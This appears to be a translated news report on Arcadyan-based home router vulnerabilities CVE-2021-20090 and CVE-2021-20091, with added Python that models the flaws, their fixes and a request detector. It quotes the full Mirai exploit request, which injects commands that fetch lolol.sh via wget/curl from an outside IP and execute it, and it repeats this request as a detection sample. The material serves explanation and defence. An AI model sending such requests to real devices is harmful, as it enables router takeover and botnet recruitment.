Vulnerability in home routers affecting 17 manufacturers

A large-scale network attack has been recorded against home routers whose firmware uses the HTTP server implementation from the company Arcadyan. To take control of the devices, a combination of two vulnerabilities is used that allows remote execution of arbitrary code with root privileges. The problem affects a fairly wide range of ADSL routers from Arcadyan, ASUS and Buffalo, as well as devices supplied under the brands of Beeline (the problem is confirmed on the Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone and other telecom operators. It is noted that the problem has been present in Arcadyan firmware for more than 10 years and during this time has managed to migrate into at least 20 device models from 17 different manufacturers.

The first vulnerability, CVE-2021-20090, makes it possible to reach any script of the web interface without authentication. The essence of the vulnerability is that in the web interface some directories, from which images, CSS files and JavaScript scripts are served, are accessible without authentication. The directories for which unauthenticated access is allowed are checked using a prefix mask, and that mask is applied to the raw, still URL-encoded path. Specifying the characters "../" in a path to move to the parent directory is blocked by the firmware, but the combination "..%2f" passes the check: it decodes to "../" only afterwards, when the file handler resolves the path. Thus it is possible to open protected pages by sending requests such as "http://192.168.1.1/images/..%2findex.htm".

The second vulnerability, CVE-2021-20091, allows an authenticated user to change the device's system settings by sending specially formatted parameters to the apply_abstract.cgi script, which does not check the parameters for newline characters. For example, when performing a ping operation, an attacker can specify the value "192.168.1.2%0AARC_SYS_TelnetdEnable=1" in the field that holds the address of the Internet host to be checked, and the script, when creating the configuration file /tmp/etc/config/.glbcfg, will write the line "ARC_SYS_TelnetdEnable=1" into it, which starts the telnetd server and gives unrestricted command-shell access with root privileges. Similarly, by setting the AARC_SYS parameter, arbitrary code can be executed on the system. The first vulnerability makes it possible to call the problematic script without authentication by accessing it as "/images/..%2fapply_abstract.cgi".
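The two flaws above, modelled in Python as an added example (this is not Arcadyan's code nor the researchers' proof of concept). It shows the prefix check applied to the raw path next to a hardened check applied to the decoded, normalised path, and a configuration writer that lets a newline in a value become a new .glbcfg line next to one that rejects control characters and validates the ping target. The public directory list and the parameter name ARC_ping_ipaddress are assumptions; the sample inputs are the requests quoted on this page.

```python
import ipaddress
import posixpath
from urllib.parse import unquote

# Directories the Arcadyan web interface serves without a login. The page names
# images, CSS and JavaScript; the exact prefix list is an assumption.
PUBLIC_PREFIXES = ("/images/", "/css/", "/js/")


def is_public_path_vulnerable(raw_path: str) -> bool:
    """Model of the flawed check (CVE-2021-20090). The prefix mask is tested on
    the raw, still URL-encoded path, so '..%2f' is never seen as a parent step."""
    if "../" in raw_path:            # the literal form is blocked by the firmware
        return False
    return raw_path.startswith(PUBLIC_PREFIXES)


def resolve(raw_path: str) -> str:
    """What the file handler opens after URL-decoding and normalising the path."""
    return posixpath.normpath(unquote(raw_path))


def is_public_path_fixed(raw_path: str) -> bool:
    """Hardened check: decode first, refuse any '..' segment, then apply the
    prefix mask to the canonical path the handler would actually open."""
    decoded = unquote(raw_path)
    if ".." in decoded.split("/"):
        return False
    return posixpath.normpath(decoded).startswith(PUBLIC_PREFIXES)


def render_lines(params: dict) -> str:
    """Serialise parameters as the firmware stores them: one KEY=VALUE per line."""
    return "".join(f"{key}={value}\n" for key, value in params.items())


def render_glbcfg_vulnerable(params: dict) -> str:
    """Model of apply_abstract.cgi (CVE-2021-20091): every submitted parameter is
    written to /tmp/etc/config/.glbcfg with no check for newlines in the value."""
    return render_lines(params)


def parse_glbcfg(text: str) -> dict:
    """How the configuration is read back. A newline smuggled into a value
    therefore turns into a separate, attacker-chosen setting."""
    cfg = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            cfg[key.strip()] = value.strip()
    return cfg


def render_glbcfg_fixed(params: dict) -> str:
    """Hardened writer: reject control characters in keys and values, and
    validate the ping target as an IP literal before it is stored."""
    for key, value in params.items():
        if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in key + value):
            raise ValueError(f"control character in parameter {key!r}")
        if key == "ARC_ping_ipaddress":   # assumed name of the ping-target field
            ipaddress.ip_address(value)    # raises ValueError on anything else
    return render_lines(params)


if __name__ == "__main__":
    traversal = "/images/..%2fapply_abstract.cgi"
    print(is_public_path_vulnerable(traversal), resolve(traversal))  # True /apply_abstract.cgi
    print(is_public_path_fixed(traversal))                             # False
    injected = {"ARC_ping_ipaddress": unquote("192.168.1.2%0AARC_SYS_TelnetdEnable=1")}
    print(parse_glbcfg(render_glbcfg_vulnerable(injected)))
    try:
        render_glbcfg_fixed(injected)
    except ValueError as err:
        print("rejected:", err)
```

The point of the hardened path check is the order of operations: canonicalise first, then authorise on the result, because any check performed on an encoding the handler will later undo can be bypassed with that encoding. The configuration writer fails for the same structural reason, so the fix is to validate the decoded value against the grammar the field actually needs (an IP literal here) rather than to blocklist one character.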

To exploit the vulnerabilities, an attacker must be able to send a request to the network port on which the web interface is served. Judging by the speed at which the attack is spreading, many operators leave access to their devices open from the external network to make troubleshooting by the support service easier. If access to the interface is restricted to the internal network only, the attack can still be carried out from outside using the "DNS rebinding" technique. The vulnerabilities are already being actively exploited to recruit routers into the Mirai botnet; the request used looks like this:

POST /images/..%2fapply_abstract.cgi HTTP/1.1
Connection: close
User-Agent: Dark

action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.72%0A ARC_SYS_TelnetdEnable=1& AARC_SYS_=cd+/tmp;+wget+http://212.192.241.72/lolol.sh;+curl+-O+http://212.192.241.72/lolol.sh;+chmod+777+lolol.sh;+sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4
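A detection pass over that request, as an added example (not from the page or the researchers): it decodes the request the way the firmware would and flags both signatures, an encoded path that leaves the public directory once normalised, and a CR/LF inside a form value together with the KEY=VALUE lines it would smuggle into .glbcfg, plus shell metacharacters in any value. The sample requests are constructed inline from the request shown above and a benign image fetch; the public directory list is an assumption.

```python
import posixpath
from urllib.parse import unquote, unquote_plus

# Paths the Arcadyan web server serves without a login (assumed list, see text).
PUBLIC_PREFIXES = ("/images/", "/css/", "/js/")
SHELL_METACHARS = (";", "|", "`", "$(", "&&")

# Constructed samples: the Mirai request quoted on this page and a benign fetch.
MIRAI_REQUEST = (
    "POST /images/..%2fapply_abstract.cgi HTTP/1.1\r\n"
    "Connection: close\r\n"
    "User-Agent: Dark\r\n"
    "\r\n"
    "action=start_ping&submit_button=ping.html&action_params=blink_time%3D5"
    "&ARC_ping_ipaddress=212.192.241.72%0A ARC_SYS_TelnetdEnable=1"
    "& AARC_SYS_=cd+/tmp;+wget+http://212.192.241.72/lolol.sh;"
    "+curl+-O+http://212.192.241.72/lolol.sh;+chmod+777+lolol.sh;+sh+lolol.sh"
    "&ARC_ping_status=0&TMP_Ping_Type=4"
)
BENIGN_REQUEST = "GET /images/logo.png HTTP/1.1\r\nHost: 192.168.1.1\r\n\r\n"


def parse_form_body(body: str) -> list:
    """Split a form-encoded body as the CGI would: only '&' separates pairs, so a
    ';' inside a value survives for inspection (parse_qsl on older Pythons would
    split on ';' too and hide the command)."""
    pairs = []
    for chunk in body.split("&"):
        if not chunk:
            continue
        key, _, value = chunk.partition("=")
        pairs.append((unquote_plus(key).strip(), unquote_plus(value)))
    return pairs


def analyse_request(raw: str) -> dict:
    """Return the indicators found in one raw HTTP request and a verdict."""
    head, _, body = raw.partition("\r\n\r\n")
    method, raw_path, _ = head.split("\r\n", 1)[0].split(" ", 2)
    canonical = posixpath.normpath(unquote(raw_path))
    # CVE-2021-20090 signature: the raw path starts with a public directory but
    # the decoded, normalised path does not.
    traversal = raw_path.startswith(PUBLIC_PREFIXES) and not canonical.startswith(PUBLIC_PREFIXES)
    injected, shell_params = {}, []
    for key, value in parse_form_body(body):
        # CVE-2021-20091 signature: every line after the first in a value would
        # be written to .glbcfg as its own setting.
        for extra in value.splitlines()[1:]:
            k, _, v = extra.strip().partition("=")
            if k:
                injected[k] = v
        if any(meta in value for meta in SHELL_METACHARS):
            shell_params.append(key)
    if traversal and (injected or shell_params):
        verdict = "exploit"
    elif traversal or injected or shell_params:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"method": method, "raw_path": raw_path, "canonical_path": canonical,
            "traversal": traversal, "injected": injected,
            "shell_params": shell_params, "verdict": verdict}


if __name__ == "__main__":
    for sample in (MIRAI_REQUEST, BENIGN_REQUEST):
        print(analyse_request(sample))
```

Matching on the raw path alone (for example a signature for the string "..%2f") is brittle, since any other encoding of the slash or of the dots defeats it; comparing the raw prefix with the normalised path catches the whole class. The same holds for the body: decoding the value and looking for a line break is what distinguishes a real injection from a harmless "%0A" in a log.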

Source: opennet.ru
